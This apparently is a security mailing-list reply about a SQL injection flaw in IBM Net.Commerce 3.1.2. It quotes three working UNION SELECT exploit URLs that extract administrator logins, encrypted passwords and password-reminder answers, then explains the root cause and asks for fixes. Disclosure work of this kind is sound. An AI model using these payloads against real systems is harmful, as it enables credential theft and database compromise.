> exploit:
>
>
> a few examples:
>
> 1) "HowTo find Administrator Accounts"
>
+http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=9+union+select+s
+hlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';
>
> 2) "Passwords(crypted)"
>
+http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=9+union+select+s
+hlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
>
Those look really funny, anyone know the what algorythm is used, i suppose
it's the standard db2 function, but haven't tried that yet.
> 3) "Password-Reminders"
>
+http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=9+union+select+s
+hchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
Actually these are the answers of the authentification questions, asked for
confirming the user's identity (which hints that the passwords may be decryptable)
>
> of course "orderdspc.d2w" is not the only vulnerable macro .. it s just an
> example. casting between different data-types is possible (read the db2-man
> pages).
>
> also it should(not proofed) be possible to query other databases.
I just confirmed that on Net.Commerce 3.1.2 and it's a really nasty bug.
One may query virtually any data from the db from almost any
macro (default & custom). I don't believe it's an error in
net.data. The whole concept is buggy and since most of the info returned by queries
is thrown in the HTML in on form or another, and the macros usually trust the
parameters passed to them and (like the order_rn) put them directly into the
'where' clause of the selects, thus allowing the attacker's 'union' to be
sent to the db as a normal sql request from the macro :(
It's quite difficult to think of a quick-fix for such a major
issue, but it seems that IBM is not releasing a patch for a
product they consider obsolete and superceeded by Web Sphere, or
atleast i couldn't find one.
Any thoughts, fixes, ideas??
~~~
Regards
Emil Popov
[EMAIL PROTECTED]